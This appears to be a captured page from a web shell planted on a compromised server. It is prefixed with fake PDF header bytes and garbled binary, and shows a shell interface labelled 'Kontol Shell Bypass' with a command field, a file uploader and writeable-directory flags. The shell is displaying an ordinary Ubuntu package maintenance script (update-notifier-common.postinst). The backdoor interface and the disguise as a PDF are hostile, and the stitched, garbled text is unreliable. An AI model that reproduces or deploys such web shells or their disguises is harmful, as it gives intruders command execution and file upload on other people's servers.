%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/lib/dpkg/info/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/lib/dpkg/info/update-notifier-common.postinst
#!/bin/sh

set -e

# fixup /var/crash permissions (#449739)
if [ "$1" = configure ] && dpkg --compare-versions "$2" le-nl "0.89"; then
    if [ -d /var/crash ] && [ "$(stat -L -c '%a' /var/crash)" = "755" ]; then
        chmod 1777 /var/crash
    fi
fi

if [ "$1" = triggered ]; then
	for trigger in $2; do
		case $trigger in
			/usr/share/package-data-downloads)
				/usr/lib/update-notifier/package-data-downloader
				;;
		esac
	done
	exit 0
fi

# Ensure permissions are correct, otherwise downloading sandboxing fails
chown -R _apt:root /var/lib/update-notifier/package-data-downloads/partial/
chmod 700 /var/lib/update-notifier/package-data-downloads/partial/

# Run this when configuring as well, since we may not be triggered at all
# depending on package unpack order.
/usr/lib/update-notifier/package-data-downloader

# Remove update-motd cpu-checker script
dpkg-maintscript-helper rm_conffile /etc/update-motd.d/20-cpu-checker \
        0.110.1ubuntu1 -- "$@"



Kontol Shell Bypass